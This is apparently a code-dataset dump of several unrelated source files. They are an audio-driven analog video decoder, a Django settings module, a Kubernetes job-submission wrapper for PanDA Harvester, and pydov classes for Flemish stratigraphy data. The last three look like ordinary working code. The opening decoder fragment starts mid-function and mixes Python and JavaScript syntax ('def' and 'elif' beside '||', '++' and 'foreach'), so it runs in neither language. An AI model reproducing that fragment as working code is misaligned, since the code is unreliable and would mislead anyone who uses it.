        r = y + 45 * cr / 32
        g = y - (11 * cb + 23 * cr) / 32
        b = y + 113 * cb / 64
        return [r, g, b]
    def process(event):
        lSamples = event.inputBuffer.getChannelData(0)
        cSamples = event.inputBuffer.getChannelData(1)
        sampleRate = self.sampleRate
        s = self.sig
        p = self.pulse
        blank = False
        for i in range(0, len(lSamples)):
            self.timing.time += 1
            lSample = lSamples[i] + Math.random() * 0.01 - 0.005
            cSample = cSamples[i] + Math.random() * 0.01 - 0.005
            if (lSample < s.LMin) s.LMin = lSample
            if (lSample > s.LMax) s.LMax = lSample
            s.LMin *= 1.0 - (1.0 / sampleRate)
            s.LMax *= 1.0 - (1.0 / sampleRate)
            if (s.LMin > -0.025) s.LMin = -0.025
            if (s.LMax < 0.025) s.LMax = 0.025
            if (cSample < s.CMin) s.CMin = cSample
            if (cSample > s.CMax) s.CMax = cSample
            s.CMin *= 1.0 - (1.0 / sampleRate)
            s.CMax *= 1.0 - (1.0 / sampleRate)
            if (s.CMin > -0.05) s.CMin = -0.05
            if (s.CMax < 0.05) s.CMax = 0.05
            luma = (lSample * 2.0 - s.LMin) / (s.LMax - s.LMin) * self.brightness * 255
            chroma = (cSample * 2.0 - s.CMin) / (s.CMax - s.CMin) * self.saturation * 255
            chromaLast = self.chromaDelay[self.chromaDelayIndex] || 0
            if (self.chromaDelayIndex < sampleRate / 10.0):
                self.chromaDelay[self.chromaDelayIndex] = chroma
                self.chromaDelayIndex++
            chroma = chroma - 128
            chromaLast = chromaLast - 128
            if (self.chromaField == 0):
                [r, g, b] = self.YCbCrToRGB(luma, chromaLast, chroma)
            else:
                [r, g, b] = self.YCbCrToRGB(luma, chroma, chromaLast)
            if (self.currLine.colors.length < 1024):
                self.currLine.colors.append(
                    {
                        "phase": self.hPhase,
                        "r": Math.max(Math.min(Math.round(r), 255), 0),
                        "g": Math.max(Math.min(Math.round(g), 255), 0),
                        "b": Math.max(Math.min(Math.round(b), 255), 0)
                    }
                )
                self.currLine.maxPhase = self.hPhase
            self.hPhase += 1.0 / self.hFreq
            self.vPhase += 1.0 / self.vFreq
            self.currLine.x2 = self.hPhaseToX(self.hPhase, self.vPhase, self.field)
            if (((s.LMax - s.LMin) > 0.1) and ((s.CMax - s.CMin) > 0.1)):
                if (lSample < s.LMin * 0.5):
                    p.luma = -1
                elif (lSample > s.LMax * 0.5):
                    p.luma = 1
                else:
                    p.luma = 0
                if (cSample < s.CMin * 0.5):
                    p.chroma = -1
                elif (cSample > s.CMax * 0.5):
                    p.chroma = 1
                else:
                    p.chroma = 0
                if ((p.luma != p.lumaPrev) or (p.chroma != p.chromaPrev)):
                    p.time = 0
                    p.lumaPrev = p.luma
                    p.chromaPrev = p.chroma
                    p.changed = True
                if ((p.luma != 0) and (p.chroma != 0)):
                    p.time += 1.0 / sampleRate
                    if ((p.time > self.pulseLength * 0.5) and (p.changed == True)):
                        p.changed = False
                        if (p.ready == False):
                            p.ready = True
                            p.timeout = self.pulseLength * 1.25
                        else:
                            p.ready = False
                            blank = True
                            if ((self.timing.time - self.timing.lastH < self.hFreqTarget * 1.5) and (self.timing.time - self.timing.lastH > self.hFreqTarget * 0.5)):
                                self.hFreq = self.hFreq * 0.9 + (self.timing.time - self.timing.lastH) * 0.1
                            self.timing.lastH = self.timing.time
                            self.hPhase = 0
                            self.chromaDelayIndex = 0
                            if (p.luma > 0):
                                self.chromaField = 0
                            else:
                                self.chromaField = 1
                            if (p.luma != p.chroma):
                                if ((self.timing.time - self.timing.lastV < self.vFreqTarget * 1.5) and (self.timing.time - self.timing.lastV > self.vFreqTarget * 0.5)):
                                    self.vFreq = self.vFreq * 0.75 + (self.timing.time - self.timing.lastV) * 0.25
                                self.timing.lastV = self.timing.time
                                self.vPhase = 0
                                self.chromaField = 1
                                if (p.luma > 0):
                                    self.field = 0
                                else:
                                    self.field = 1
                if (p.ready == True):
                    p.timeout -= 1.0 / sampleRate
                    if (p.timeout <= 0):
                        p.ready = False
            else:
                p.luma = p.lumaPrev = 0
                p.chroma = p.chromaPrev = 0
                p.changed = False
                p.ready = False
            self.hFreq = self.hFreq * (1.0 - 1.0 / sampleRate) + self.hFreqTarget * (1.0 / sampleRate)
            self.vFreq = self.vFreq * (1.0 - 1.0 / sampleRate) + self.vFreqTarget * (1.0 / sampleRate)
            if (self.hPhase >= 1.0):
                blank = True
                self.hPhase -= 1.0
                self.chromaDelayIndex = 0
                if (self.chromaField == 1):
                    self.chromaField = 0
                else:
                    self.chromaField = 1
            if (self.vPhase >= 1.0):
                blank = True
                self.vPhase -= 1.0
                if (self.field == 0):
                    self.field = 1
                else:
                    self.field = 0
            if (blank == True):
                if ((self.lines.length < 1024) and (self.currLine.colors.length > 5) and (self.currLine.maxPhase > 0)):
                    self.lines.append(self.currLine)
                self.currLine =
                    {
                        x1: self.hPhaseToX(self.hPhase, self.vPhase, self.field),
                        y: self.vPhaseToY(self.hPhase, self.vPhase, self.field),
                        maxPhase: 0,
                        colors: []
                    }
                blank = False
    def draw():
        requestAnimationFrame(() => self.draw())
        if (Date.now() - self.lastClear > self.clearInterval):
            self.ctx.fillStyle = 'rgba(0,0,0,0.05)'
            self.ctx.globalCompositeOperation = 'source-over'
            self.ctx.fillRect(0, 0, self.width, self.height)
            self.lastClear = Date.now()
        if (self.blend == True):
            self.ctx.globalCompositeOperation = 'screen'
        self.ctx.lineWidth = self.lineWidth
        foreach (line in self.lines):
            grd = self.ctx.createLinearGradient(line.x1, line.y, line.x2, line.y)
            foreach (color in line.colors):
                grd.addColorStop(color.phase / line.maxPhase, 'rgb(' + color.r + ',' + color.g + ',' + color.b + ')')
            self.ctx.beginPath()
            self.ctx.moveTo(line.x1 + Math.random() * 2.0 - 1.0, line.y + Math.random() * 2.0 - 1.0)
            self.ctx.lineTo(line.x2 + Math.random() * 2.0 - 1.0, line.y + Math.random() * 2.0 - 1.0)
            self.ctx.strokeStyle = grd
            self.ctx.stroke()
        self.lines = []
1779425 | """
Django settings for homevisit_project project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import sys
from logging import Filter
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# The hard-coded key below is used only when no SECRET_KEY env var is set.
DEV_SECRET_KEY = "mrsrrt0nzre%73*437pll372ky4rch_@y%g1$sa_@*=$0j89ex"
SECRET_KEY = os.getenv("SECRET_KEY", DEV_SECRET_KEY)
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG is on exactly when SECRET_KEY is *not* provided via the environment,
# i.e. production deployments must export SECRET_KEY (which also disables DEBUG).
DEBUG = "SECRET_KEY" not in os.environ
HOST_NAME = os.getenv("HOST_NAME", "localhost")
ALLOWED_HOSTS = [HOST_NAME]
# Email settings
EMAIL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
EMAIL_HOST = os.getenv("EMAIL_HOST")
# BUG FIX: os.getenv returns *strings* when the variable is set, so
# EMAIL_USE_TLS previously became truthy even for "False"/"0", and
# EMAIL_PORT could be a str where Django expects an int. Parse explicitly;
# defaults (TLS on, port 587) are unchanged.
EMAIL_USE_TLS = os.getenv("EMAIL_USE_TLS", "True").lower() in ("1", "true", "yes")
EMAIL_PORT = int(os.getenv("EMAIL_PORT", 587))
EMAIL_HOST_USER = os.getenv("EMAIL_HOST_USER")
EMAIL_HOST_PASSWORD = os.getenv("EMAIL_HOST_PASSWORD")
# Homevisit-specific settings
# How many weeks ahead meetings stay visible before being hidden.
HOMEVISIT_HIDE_WEEKS_AFTER = int(os.getenv("HOMEVISIT_HIDE_WEEKS_AFTER", 52))
# Application definition
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "homevisit",
    "crispy_forms",
    "phonenumber_field",
]
MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "homevisit_project.urls"
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ]
        },
    }
]
WSGI_APPLICATION = "homevisit_project.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# Single SQLite database stored at the project root.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.sqlite3",
        "NAME": os.path.join(BASE_DIR, "db.sqlite3"),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"},
    {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
    {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
    {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "US/Pacific"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = "/static/"
X_FRAME_OPTIONS = "DENY"
# Don't log to console during tests: https://stackoverflow.com/questions/5255657
# True when the process was started as `manage.py test`; also gates the
# HTTPS/static hardening block just below and the logging filter further down.
TESTING_MODE = len(sys.argv) > 1 and sys.argv[1] == "test"
if not TESTING_MODE:
    # Production-ish hardening: collected static root, secure headers, and
    # HTTPS-only cookies/redirects (skipped while running the test suite).
    STATIC_ROOT = os.path.join(BASE_DIR, "static")
    SECURE_CONTENT_TYPE_NOSNIFF = True
    SECURE_BROWSER_XSS_FILTER = True
    SESSION_COOKIE_SECURE = True
    CSRF_COOKIE_SECURE = True
    SECURE_SSL_REDIRECT = True
class NotInTestingFilter(Filter):
    """Logging filter that drops every record while the test suite is running."""
    def filter(self, record):
        # Keep the record (True) only when not running under `manage.py test`.
        return not TESTING_MODE
# Console logging for the `homevisit` app; the "testing" filter (above)
# silences output while tests run.
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "filters": {"testing": {"()": NotInTestingFilter}},
    "formatters": {
        "standard": {
            "format": "%(asctime)-15s [%(levelname)-7s] %(name)-14s: %(message)s"
        }
    },
    "handlers": {
        "console": {
            "level": "DEBUG",
            "class": "logging.StreamHandler",
            "filters": ["testing"],
            "formatter": "standard",
        }
    },
    "loggers": {"homevisit": {"handlers": ["console"], "level": "DEBUG"}},
}
# Third-party app configuration: bootstrap4 templates for crispy-forms,
# US as the default region for phonenumber_field parsing.
CRISPY_TEMPLATE_PACK = "bootstrap4"
PHONENUMBER_DEFAULT_REGION = "US"
149445 | """
utilities routines associated with Kubernetes python client
"""
import os
import copy
import base64
import yaml
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from pandaharvester.harvesterconfig import harvester_config
from pandaharvester.harvestermisc.info_utils import PandaQueuesDict
class k8s_Client(object):
    """Convenience wrapper around the official Kubernetes Python client.

    All operations act on a single namespace ('default' when none is given).
    Used by Harvester to submit worker Jobs from a YAML template, query
    pod/job state, clean up finished workers and manage proxy secrets.
    """

    def __init__(self, namespace, config_file=None):
        """Load kube config and build the CoreV1/BatchV1 API clients."""
        config.load_kube_config(config_file=config_file)
        self.namespace = namespace if namespace else 'default'
        self.corev1 = client.CoreV1Api()
        self.batchv1 = client.BatchV1Api()
        # Background propagation: dependent pods are garbage-collected
        # asynchronously after the owning job is deleted.
        self.deletev1 = client.V1DeleteOptions(propagation_policy='Background')

    def read_yaml_file(self, yaml_file):
        """Parse a YAML file and return its content as Python objects."""
        with open(yaml_file) as f:
            yaml_content = yaml.load(f, Loader=yaml.FullLoader)
        return yaml_content

    def create_job_from_yaml(self, yaml_content, work_spec, cert, cert_in_secret=True, cpuadjustratio=100, memoryadjustratio=100):
        """Fill the job YAML template for one worker and submit it.

        The job name is suffixed with the worker ID; CPU/memory *requests*
        are scaled by the adjust ratios (percent) while *limits* keep the
        nominal values. Values pre-set in the template are NOT overwritten.
        Returns the API server's response for the created job.
        """
        panda_queues_dict = PandaQueuesDict()
        queue_name = panda_queues_dict.get_panda_queue_name(work_spec.computingSite)
        yaml_content['metadata']['name'] = yaml_content['metadata']['name'] + "-" + str(work_spec.workerID)
        yaml_content['spec']['template'].setdefault('metadata', {})
        yaml_content['spec']['template']['metadata'].update({
            'labels': {'resourceType': str(work_spec.resourceType)}})
        # Only the first container of the template is used; drop the rest.
        yaml_containers = yaml_content['spec']['template']['spec']['containers']
        del(yaml_containers[1:len(yaml_containers)])
        container_env = yaml_containers[0]
        container_env.setdefault('resources', {})
        # note that predefined values in the yaml template will NOT be overwritten
        if work_spec.nCore > 0:
            container_env['resources'].setdefault('limits', {
                'cpu': str(work_spec.nCore)})
            container_env['resources'].setdefault('requests', {
                'cpu': str(work_spec.nCore*cpuadjustratio/100.0)})
        if work_spec.minRamCount > 4:
            # K8S minimum memory limit = 4 MB
            container_env['resources'].setdefault('limits', {
                'memory': str(work_spec.minRamCount) + 'M'})
            container_env['resources'].setdefault('requests', {
                'memory': str(work_spec.minRamCount*memoryadjustratio/100.0) + 'M'})
        container_env.setdefault('env', [])
        # Either the secret path or the inlined proxy content is set, not both.
        container_env['env'].extend([
            {'name': 'computingSite', 'value': work_spec.computingSite},
            {'name': 'pandaQueueName', 'value': queue_name},
            {'name': 'resourceType', 'value': work_spec.resourceType},
            {'name': 'proxySecretPath', 'value': cert if cert_in_secret else None},
            {'name': 'proxyContent', 'value': None if cert_in_secret else self.set_proxy(cert)},
            {'name': 'workerID', 'value': str(work_spec.workerID)},
            {'name': 'logs_frontend_w', 'value': harvester_config.pandacon.pandaCacheURL_W},
            {'name': 'logs_frontend_r', 'value': harvester_config.pandacon.pandaCacheURL_R},
            {'name': 'PANDA_JSID', 'value': 'harvester-' + harvester_config.master.harvester_id},
            {'name': 'HARVESTER_WORKER_ID', 'value': str(work_spec.workerID)},
            {'name': 'HARVESTER_ID', 'value': harvester_config.master.harvester_id}
            ])
        if 'affinity' not in yaml_content['spec']['template']['spec']:
            yaml_content = self.set_affinity(yaml_content)
        rsp = self.batchv1.create_namespaced_job(body=yaml_content, namespace=self.namespace)
        return rsp

    def get_pods_info(self):
        """Return a list of dicts describing every pod in the namespace."""
        pods_list = list()
        ret = self.corev1.list_namespaced_pod(namespace=self.namespace)
        for i in ret.items:
            pod_info = {}
            pod_info['name'] = i.metadata.name
            # Strip tzinfo so timestamps compare cleanly with naive datetimes.
            pod_info['start_time'] = i.status.start_time.replace(tzinfo=None) if i.status.start_time else i.status.start_time
            pod_info['status'] = i.status.phase
            pod_info['status_reason'] = i.status.conditions[0].reason if i.status.conditions else None
            pod_info['status_message'] = i.status.conditions[0].message if i.status.conditions else None
            pod_info['job_name'] = i.metadata.labels['job-name'] if i.metadata.labels and 'job-name' in i.metadata.labels else None
            pods_list.append(pod_info)
        return pods_list

    def filter_pods_info(self, pods_list, job_name=None):
        """Return only the pods belonging to job_name (all pods when None)."""
        if job_name:
            pods_list = [i for i in pods_list if i['job_name'] == job_name]
        return pods_list

    def get_jobs_info(self, job_name=None):
        """Return a list of dicts describing jobs (optionally just job_name)."""
        jobs_list = list()
        field_selector = 'metadata.name=' + job_name if job_name else ''
        ret = self.batchv1.list_namespaced_job(namespace=self.namespace, field_selector=field_selector)
        for i in ret.items:
            job_info = {}
            job_info['name'] = i.metadata.name
            # FIX: guard against jobs with no status conditions yet, matching
            # the guard in get_pods_info (previously this raised on such jobs).
            condition = i.status.conditions[0] if i.status.conditions else None
            job_info['status'] = condition.type if condition else None
            job_info['status_reason'] = condition.reason if condition else None
            job_info['status_message'] = condition.message if condition else None
            jobs_list.append(job_info)
        return jobs_list

    def delete_pods(self, pod_name_list):
        """Delete the given pods immediately; return [{'name':..., 'errMsg':...}]."""
        retList = list()
        for pod_name in pod_name_list:
            rsp = {}
            rsp['name'] = pod_name
            try:
                self.corev1.delete_namespaced_pod(name=pod_name, namespace=self.namespace, body=self.deletev1, grace_period_seconds=0)
            except ApiException as _e:
                # 404 means the pod is already gone -- not an error here.
                rsp['errMsg'] = '' if _e.status == 404 else _e.reason
            else:
                rsp['errMsg'] = ''
            retList.append(rsp)
        return retList

    def delete_job(self, job_name):
        """Delete a job immediately; pods are cleaned up in the background."""
        self.batchv1.delete_namespaced_job(name=job_name, namespace=self.namespace, body=self.deletev1, grace_period_seconds=0)

    def set_proxy(self, proxy_path):
        """Read a proxy file and return its content with newlines replaced by
        commas (suitable for passing through a container env variable).

        Note: the result keeps a trailing comma when the file ends in a newline.
        """
        with open(proxy_path) as f:
            content = f.read()
        content = content.replace("\n", ",")
        return content

    def set_affinity(self, yaml_content):
        """Add pod (anti-)affinity so SCORE pods pack together and avoid MCORE.

        SCORE workers get affinity to other SCORE pods plus anti-affinity to
        MCORE pods (both soft, weight 100, per-node topology); other resource
        types only get the anti-affinity to the opposite type.
        """
        yaml_content['spec']['template']['spec']['affinity'] = {}
        yaml_affinity = yaml_content['spec']['template']['spec']['affinity']
        res_element = {'SCORE', 'MCORE'}
        affinity_spec = {
            'preferredDuringSchedulingIgnoredDuringExecution': [
                {'weight': 100, 'podAffinityTerm': {
                    'labelSelector': {'matchExpressions': [
                        {'key': 'resourceType', 'operator': 'In', 'values': ['SCORE']}]},
                    'topologyKey': 'kubernetes.io/hostname'}
                }]}
        resourceType = yaml_content['spec']['template']['metadata']['labels']['resourceType']
        if resourceType == 'SCORE':
            yaml_affinity['podAffinity'] = copy.deepcopy(affinity_spec)
            yaml_affinity['podAffinity']['preferredDuringSchedulingIgnoredDuringExecution'][0]['podAffinityTerm']['labelSelector']['matchExpressions'][0]['values'][0] = resourceType
        yaml_affinity['podAntiAffinity'] = copy.deepcopy(affinity_spec)
        yaml_affinity['podAntiAffinity']['preferredDuringSchedulingIgnoredDuringExecution'][0]['podAffinityTerm']['labelSelector']['matchExpressions'][0]['values'][0] = res_element.difference({resourceType}).pop()
        return yaml_content

    def create_or_patch_secret(self, file_list, secret_name):
        """Base64-encode the given files into a secret; patch it, or create it
        if patching fails (e.g. the secret does not exist yet)."""
        # api_version = 'v1'
        # kind = 'Secret'
        # type='kubernetes.io/tls'
        metadata = {'name': secret_name, 'namespace': self.namespace}
        data = {}
        for file_path in file_list:
            filename = os.path.basename(file_path)
            with open(file_path, 'rb') as f:
                raw = f.read()  # FIX: was `str = f.read()`, shadowing the builtin
            data[filename] = base64.b64encode(raw).decode()
        body = client.V1Secret(data=data, metadata=metadata)
        try:
            rsp = self.corev1.patch_namespaced_secret(name=secret_name, body=body, namespace=self.namespace)
        except ApiException as e:
            print('Exception when patch secret: {0} . Try to create secret instead...'.format(e))
            rsp = self.corev1.create_namespaced_secret(body=body, namespace=self.namespace)
        return rsp
| StarcoderdataPython |
3304508 | # -*- coding: utf-8 -*-
"""Module containing the DOV data type for boreholes (Boring), including
subtypes."""
import numpy as np
from pydov.types.abstract import (
AbstractDovType,
AbstractDovSubType,
)
class InformeleStratigrafieLaag(AbstractDovSubType):
    """Subtype: one layer ('laag') of an informal stratigraphy
    interpretation, parsed from the interpretation's XML document."""
    _name = 'informele_stratigrafie_laag'
    _rootpath = './/informelestratigrafie/laag'
    # Field metadata consumed by the pydov framework (order matters for
    # the resulting dataframe columns).
    _fields = [{
        'name': 'diepte_laag_van',
        'source': 'xml',
        'sourcefield': '/van',
        'definition': 'Diepte van de bovenkant van de laag informele '
                      'stratigrafie in meter.',
        'type': 'float',
        'notnull': False
    }, {
        'name': 'diepte_laag_tot',
        'source': 'xml',
        'sourcefield': '/tot',
        'definition': 'Diepte van de onderkant van de laag informele '
                      'stratigrafie in meter.',
        'type': 'float',
        'notnull': False
    }, {
        'name': 'beschrijving',
        'source': 'xml',
        'sourcefield': '/beschrijving',
        'definition': 'Benoeming van de eenheid van de laag informele '
                      'stratigrafie in vrije tekst (onbeperkt in lengte).',
        'type': 'string',
        'notnull': False
    }]
    def __init__(self):
        """Initialisation."""
        super(InformeleStratigrafieLaag, self).__init__(
            'informele_stratigrafie_laag')
    @classmethod
    def from_xml_element(cls, element):
        """Build an instance of this subtype from a single XML element.

        Parameters
        ----------
        element : etree.Element
            XML element representing a single record of this subtype.

        Returns
        -------
        InformeleStratigrafieLaag
            Instance populated with the data parsed from `element`.
        """
        laag = InformeleStratigrafieLaag()
        # Parse every declared field from the XML element, converting to
        # the declared type.
        for field in cls.get_fields().values():
            laag.data[field['name']] = laag._parse(
                func=element.findtext,
                xpath=field['sourcefield'],
                namespace=None,
                returntype=field.get('type', None)
            )
        return laag
class InformeleStratigrafie(AbstractDovType):
    """Class representing the DOV data type for informal stratigraphy
    ('informele stratigrafie') interpretations."""
    _subtypes = [InformeleStratigrafieLaag]
    # Field metadata consumed by the pydov framework (order matters for
    # the resulting dataframe columns).
    _fields = [{
        'name': 'pkey_interpretatie',
        'source': 'wfs',
        'sourcefield': 'Interpretatiefiche',
        'type': 'string'
    }, {
        'name': 'pkey_boring',
        'source': 'custom',
        'type': 'string',
        'definition': 'URL die verwijst naar de gegevens van de boring '
                      'waaraan deze informele stratigrafie gekoppeld is ('
                      'indien gekoppeld aan een boring).',
        'notnull': False
    }, {
        'name': 'pkey_sondering',
        'source': 'custom',
        'type': 'string',
        'definition': 'URL die verwijst naar de gegevens van de sondering '
                      'waaraan deze informele stratigrafie gekoppeld is ('
                      'indien gekoppeld aan een sondering).',
        'notnull': False
    }, {
        'name': 'betrouwbaarheid_interpretatie',
        'source': 'wfs',
        'sourcefield': 'Betrouwbaarheid',
        'type': 'string'
    }, {
        'name': 'x',
        'source': 'wfs',
        'sourcefield': 'X_mL72',
        'type': 'float'
    }, {
        'name': 'y',
        'source': 'wfs',
        'sourcefield': 'Y_mL72',
        'type': 'float'
    }]
    def __init__(self, pkey):
        """Initialisation.

        Parameters
        ----------
        pkey : str
            Permanent key of the interpretation, being a URI of the form
            `https://www.dov.vlaanderen.be/data/interpretaties/<id>`.

        """
        super(InformeleStratigrafie, self).__init__(
            'interpretatie', pkey)
    @classmethod
    def from_wfs_element(cls, feature, namespace):
        """Build an `InformeleStratigrafie` instance from a WFS feature
        element.

        Parameters
        ----------
        feature : etree.Element
            XML element representing a single record of the WFS layer.
        namespace : str
            Namespace associated with this WFS featuretype.

        Returns
        -------
        infstrat : InformeleStratigrafie
            An instance of this class populated with the data from the WFS
            element.

        """
        infstrat = InformeleStratigrafie(
            feature.findtext('./{%s}Interpretatiefiche' % namespace))
        # The interpretation is linked either to a borehole or to a CPT;
        # Type_proef tells which one, Proeffiche carries the link.
        typeproef = cls._parse(
            func=feature.findtext,
            xpath='Type_proef',
            namespace=namespace,
            returntype='string'
        )
        if typeproef == 'Boring':
            infstrat.data['pkey_boring'] = cls._parse(
                func=feature.findtext,
                xpath='Proeffiche',
                namespace=namespace,
                returntype='string'
            )
            infstrat.data['pkey_sondering'] = np.nan
        elif typeproef == 'Sondering':
            infstrat.data['pkey_sondering'] = cls._parse(
                func=feature.findtext,
                xpath='Proeffiche',
                namespace=namespace,
                returntype='string'
            )
            infstrat.data['pkey_boring'] = np.nan
        else:
            infstrat.data['pkey_boring'] = np.nan
            infstrat.data['pkey_sondering'] = np.nan
        # Remaining WFS fields; the two custom pkey fields were handled
        # above and must be skipped here.
        for field in cls.get_fields(source=('wfs',)).values():
            if field['name'] in ['pkey_boring', 'pkey_sondering']:
                continue
            infstrat.data[field['name']] = cls._parse(
                func=feature.findtext,
                xpath=field['sourcefield'],
                namespace=namespace,
                returntype=field.get('type', None)
            )
        return infstrat
class HydrogeologischeStratigrafieLaag(AbstractDovSubType):
    """Subtype: one layer ('laag') of a hydrogeological stratigraphy
    interpretation, parsed from the interpretation's XML document."""
    _name = 'hydrogeologische_stratigrafie_laag'
    _rootpath = './/hydrogeologischeinterpretatie/laag'
    # Field metadata consumed by the pydov framework (order matters for
    # the resulting dataframe columns).
    _fields = [{
        'name': 'diepte_laag_van',
        'source': 'xml',
        'sourcefield': '/van',
        'definition': 'Diepte van de bovenkant van de laag hydrogeologische '
                      'stratigrafie in meter.',
        'type': 'float',
        'notnull': False
    }, {
        'name': 'diepte_laag_tot',
        'source': 'xml',
        'sourcefield': '/tot',
        'definition': 'Diepte van de onderkant van de laag hydrogeologische '
                      'stratigrafie in meter.',
        'type': 'float',
        'notnull': False
    }, {
        'name': 'aquifer',
        'source': 'xml',
        'sourcefield': '/aquifer',
        'definition': 'code van de watervoerende laag waarin de laag '
                      'Hydrogeologische stratigrafie zich bevindt.',
        'type': 'string',
        'notnull': False
    }]
    def __init__(self):
        """Initialisation."""
        # NOTE(review): the name passed to the base class
        # ('hydrogeologische_interpretatie_laag') differs from _name
        # ('hydrogeologische_stratigrafie_laag'), unlike the sibling
        # subtypes where the two match -- confirm whether this is intended.
        super(HydrogeologischeStratigrafieLaag, self).__init__(
            'hydrogeologische_interpretatie_laag')
    @classmethod
    def from_xml_element(cls, element):
        """Build an instance of this subtype from a single XML element.

        Parameters
        ----------
        element : etree.Element
            XML element representing a single record of this subtype.

        Returns
        -------
        HydrogeologischeStratigrafieLaag
            Instance populated with the data parsed from `element`.
        """
        laag = HydrogeologischeStratigrafieLaag()
        # Parse every declared field from the XML element, converting to
        # the declared type.
        for field in cls.get_fields().values():
            laag.data[field['name']] = laag._parse(
                func=element.findtext,
                xpath=field['sourcefield'],
                namespace=None,
                returntype=field.get('type', None)
            )
        return laag
class HydrogeologischeStratigrafie(AbstractDovType):
    """Class representing the DOV data type for hydrogeological
    stratigraphy ('hydrogeologische stratigrafie') interpretations."""
    _subtypes = [HydrogeologischeStratigrafieLaag]
    # Field metadata consumed by the pydov framework (order matters for
    # the resulting dataframe columns).
    _fields = [{
        'name': 'pkey_interpretatie',
        'source': 'wfs',
        'sourcefield': 'Interpretatiefiche',
        'type': 'string'
    }, {
        'name': 'pkey_boring',
        'source': 'custom',
        'type': 'string',
        'definition': 'URL die verwijst naar de gegevens van de boring '
                      'waaraan deze hydrogeologische stratigrafie '
                      'gekoppeld is '
                      '(indien gekoppeld aan een boring).',
        'notnull': False
    }, {
        'name': 'pkey_sondering',
        'source': 'custom',
        'type': 'string',
        # NOTE(review): 'informele stratigrafie' in the definition below
        # looks copy-pasted from the sibling class; it probably should
        # read 'hydrogeologische stratigrafie'.
        'definition': 'URL die verwijst naar de gegevens van de sondering '
                      'waaraan deze informele stratigrafie gekoppeld is ('
                      'indien gekoppeld aan een sondering).',
        'notnull': False
    }, {
        'name': 'betrouwbaarheid_interpretatie',
        'source': 'wfs',
        'sourcefield': 'Betrouwbaarheid',
        'type': 'string'
    }, {
        'name': 'x',
        'source': 'wfs',
        'sourcefield': 'X_mL72',
        'type': 'float'
    }, {
        'name': 'y',
        'source': 'wfs',
        'sourcefield': 'Y_mL72',
        'type': 'float'
    }]
    def __init__(self, pkey):
        """Initialisation.

        Parameters
        ----------
        pkey : str
            Permanent key of the Hydrogeologische stratigrafie, being a URI
            of the form
            `https://www.dov.vlaanderen.be/data/interpretaties/<id>`.

        """
        super(HydrogeologischeStratigrafie, self).__init__(
            'interpretatie', pkey)
    @classmethod
    def from_wfs_element(cls, feature, namespace):
        """Build 'HydrogeologischeStratigrafie' instance from a WFS feature
        element.

        Parameters
        ----------
        feature : etree.Element
            XML element representing a single record of the WFS layer.
        namespace : str
            Namespace associated with this WFS featuretype.

        Returns
        -------
        HydrogeologischeStratigrafie : HydrogeologischeStratigrafie
            An instance of this class populated with the data from the WFS
            element.

        """
        hydstrat = HydrogeologischeStratigrafie(
            feature.findtext('./{%s}Interpretatiefiche' % namespace))
        # The interpretation is linked either to a borehole or to a CPT;
        # Type_proef tells which one, Proeffiche carries the link.
        typeproef = cls._parse(
            func=feature.findtext,
            xpath='Type_proef',
            namespace=namespace,
            returntype='string'
        )
        if typeproef == 'Boring':
            hydstrat.data['pkey_boring'] = cls._parse(
                func=feature.findtext,
                xpath='Proeffiche',
                namespace=namespace,
                returntype='string'
            )
            hydstrat.data['pkey_sondering'] = np.nan
        elif typeproef == 'Sondering':
            hydstrat.data['pkey_sondering'] = cls._parse(
                func=feature.findtext,
                xpath='Proeffiche',
                namespace=namespace,
                returntype='string'
            )
            hydstrat.data['pkey_boring'] = np.nan
        else:
            hydstrat.data['pkey_boring'] = np.nan
            hydstrat.data['pkey_sondering'] = np.nan
        # Remaining WFS fields; the two custom pkey fields were handled
        # above and must be skipped here.
        for field in cls.get_fields(source=('wfs',)).values():
            if field['name'] in ['pkey_boring', 'pkey_sondering']:
                continue
            hydstrat.data[field['name']] = cls._parse(
                func=feature.findtext,
                xpath=field['sourcefield'],
                namespace=namespace,
                returntype=field.get('type', None)
            )
        return hydstrat
class LithologischeBeschrijvingLaag(AbstractDovSubType):
    """Subtype: one layer ('laag') of a lithological description
    interpretation, parsed from the interpretation's XML document."""
    _name = 'lithologische_beschrijving_laag'
    _rootpath = './/lithologischebeschrijving/laag'
